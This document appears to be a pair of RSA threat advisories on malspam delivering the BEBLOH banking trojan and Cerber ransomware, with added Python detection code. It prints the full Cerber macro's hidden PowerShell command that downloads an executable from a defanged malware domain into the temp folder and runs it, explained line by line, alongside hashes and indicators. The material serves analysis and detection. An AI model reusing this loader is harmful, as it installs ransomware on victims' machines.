Malspam activity was noted on July 20, 2017 delivering the BEBLOH banking trojan. BEBLOH has been around since 2009 and is able to steal money straight out of unsuspecting victims' bank accounts [1]. Based on the observed delivery documents, this campaign appears to target users in Japan.

Scan results of a delivery document can be found here. Here is a screenshot taken of the malicious spreadsheet:

Submitting the spreadsheet to RSA's pre-release What's This File service shows the maximum threat score:

The What's This File service also shows the embedded VBA code:

Here is the host behavior upon opening the delivery document on a machine with the RSA NetWitness Endpoint agent installed:

Obfuscated PowerShell code is used to download an executable to a local directory. The screenshot below shows the download activity in RSA NetWitness:

VirusTotal scan results for the downloaded executable suggest it is a BEBLOH variant. The EXE is saved to the user's Documents folder as %appdata%.exe.

Here is the process tree:

The download sessions are tagged with several meta values in RSA NetWitness, including http two headers, http no referer, http no user-agent and http get no post under Service Analysis, and exe filetype under File Analysis.

BEBLOH delivery documents (SHA256):

  • fc0d7e53b0d55232a4a89614841ec77f022aab845a08dd4cbc47d3d6d35fc641
  • d82f57b4ab676ae02c710becedf9a0883f935fee89abf98c010c1a8b122b7140
  • 87d3eb0c512568c3cbe931670680b77d3f039312279f6817542dc612619d6449

BEBLOH Trojan (SHA256):

  • 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad

All the IOCs from those HTTP sessions were added to the FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threat.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'

References:

  1. TrendLabs Security Intelligence Blog: "BEBLOH Expands to Japan in Latest Spam Attack"

During the early weeks of July, malspam activity delivered a malicious Word document that uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector: macros are often abused to perform malicious tasks such as downloading and dropping malware, and victims can easily be tricked into running the malicious macro.

Submitting the delivery document to the What's This File service shows more information about the malicious Word document.

The process tree below also captures this activity and shows the series of events that led to downloading and executing the Cerber payload:

The macro in the Word document calls PowerShell to connect to the malware's distribution website and download and run an executable:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

Line-by-line analysis of the PowerShell command:

powershell.exe

  • The first part of the command launches the PowerShell executable from the Windows System32 directory.

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods, which substantially increases the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');

  • The $urls variable is assigned the URL of a malicious binary hosted on a malicious domain.
  • The variable can also string together multiple binaries hosted on different domains by separating the URLs with commas; Split(',') turns the string into a list.

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + '\' + $name + '.exe';

  • The $path variable is built from the $env:temp environment variable, which points to the user's AppData temp folder, followed by the random name and an .exe extension.

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;break;}

  • Executes the downloaded file. Once a download succeeds and the process has been started, break exits the loop so no further URLs are tried; the window stays hidden throughout.

catch{write-host $_.Exception.Message;}

  • If the download or execution fails, the exception message is written to the hidden window and the loop moves on to the next URL, so the script keeps running silently in the background.
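As an added detection example (not part of the original advisory), the following Python scores a process-creation command line for the pattern analysed above: hidden window, WScript.Shell and WebClient instantiation, DownloadFile into $env:temp with an .exe name, Start-Process, and a catch block that swallows errors. The indicator regexes, the threshold and the Office-parent list are hypothetical, and the sample command line is the one above with the hostname replaced by a placeholder.

```python
import re
from dataclasses import dataclass

# Hypothetical indicators distilled from the command analysed above; each is a
# case-insensitive regex applied to a process-creation command line (Sysmon/EDR).
INDICATORS = [
    ("hidden_window",  re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("com_shell",      re.compile(r"new-object\s+-comobject\s+wscript\.shell", re.I)),
    ("webclient",      re.compile(r"new-object\s+system\.net\.webclient", re.I)),
    ("download_file",  re.compile(r"\.downloadfile\s*\(", re.I)),
    ("temp_exe_path",  re.compile(r"\$env:temp\b.*?\.exe", re.I)),
    ("start_process",  re.compile(r"start-process\s+\$\w+", re.I)),
    ("silent_catch",   re.compile(r"catch\s*\{\s*write-host", re.I)),
]

# Office parents that should not be spawning PowerShell downloaders (hypothetical list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

@dataclass
class Verdict:
    indicators: list
    office_parent: bool

    @property
    def score(self) -> int:
        return len(self.indicators)

    @property
    def suspicious(self) -> bool:
        # Hypothetical threshold: three indicators, or two when an Office app is the parent.
        return self.score >= 3 or (self.office_parent and self.score >= 2)

def analyze(command_line: str, parent_image: str = "") -> Verdict:
    """Score one command line for the hidden download-and-run pattern."""
    hits = [name for name, rx in INDICATORS if rx.search(command_line)]
    parent = parent_image.lower().rsplit("\\", 1)[-1]
    return Verdict(indicators=hits, office_parent=parent in OFFICE_PARENTS)

# Constructed samples: the loader command line from above (hostname replaced by a
# placeholder) and a benign administrative command.
LOADER = ("powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;"
          "$webclient = new-object System.Net.WebClient;$random = new-object random;"
          "$urls = 'http://delivery.example/admin.php?f=1.jpg'.Split(',');"
          "$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';"
          "foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);"
          "Start-Process $path;break;}catch{write-host $_.Exception.Message;}}")
BENIGN = "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs -Recurse"
```

Running `analyze(LOADER, parent_image)` with WINWORD.EXE as the parent hits all seven indicators, while the benign command hits none.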

In our case it downloads a "JPG" file, which is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe. It runs and spawns a number of processes to gather information and encrypt files on the infected system.

VirusTotal analysis of the dropped file confirms it is Cerber ransomware:

Once the ransomware has successfully installed, post-infection traffic shows the typical Cerber beaconing UDP spray out to 77.12.57/24 on port 6893.

Current NetWitness detection flags both the payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field.

Additionally, the <File Analysis> flags 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.
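As an added example (not part of the original posts), this Python approximates the Service Analysis and File Analysis meta values named in both advisories (http two headers, http no referer, http no user-agent, http get no post, exe filetype, exe filetype but not exe extension) over constructed HTTP session records. The tagging rules are a hypothetical reimplementation, not NetWitness's own parser logic; the sample loader session assumes that a default WebClient request carries only Host and Connection headers, and uses a placeholder hostname.

```python
from dataclasses import dataclass

@dataclass
class HttpSession:
    """One reconstructed HTTP request/response (constructed input for this example)."""
    method: str
    url: str
    request_headers: dict
    response_body: bytes = b""

EXE_MAGIC = b"MZ"  # PE files start with the DOS header signature

def has_exe_extension(url: str) -> bool:
    """Check the URL path (ignoring the query string) for a .exe suffix."""
    return url.split("?", 1)[0].lower().endswith(".exe")

def tag_session(s: HttpSession) -> set:
    """Approximate the Service Analysis / File Analysis meta values named above.

    Hypothetical reimplementation, not NetWitness's parser logic."""
    tags = set()
    names = {h.lower() for h in s.request_headers}
    if len(names) == 2:
        tags.add("http two headers")
    if "referer" not in names:
        tags.add("http no referer")
    if "user-agent" not in names:
        tags.add("http no user-agent")
    if s.method.upper() == "GET":          # single-request view of "GET, no POST"
        tags.add("http get no post")
    if s.response_body.startswith(EXE_MAGIC):
        tags.add("exe filetype")
        if not has_exe_extension(s.url):  # e.g. admin.php?f=1.jpg returning a PE
            tags.add("exe filetype but not exe extension")
    return tags

def is_suspicious_download(tags: set) -> bool:
    """A PE fetched by a near-headerless GET: the pattern seen in both campaigns above."""
    return "exe filetype" in tags and {"http no referer", "http no user-agent"} <= tags

# Constructed samples; hostnames are placeholders, the PE body is a stub DOS header.
LOADER = HttpSession("GET", "http://delivery.example/admin.php?f=1.jpg",
                     {"Host": "delivery.example", "Connection": "Keep-Alive"},
                     b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56)
BROWSER = HttpSession("GET", "http://www.example.com/index.html",
                      {"Host": "www.example.com", "User-Agent": "Mozilla/5.0",
                       "Accept": "text/html", "Referer": "http://www.example.com/"},
                      b"<!doctype html><html></html>")
```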

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution, and detection techniques using RSA NetWitness, please check the following RSA Link articles:

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.
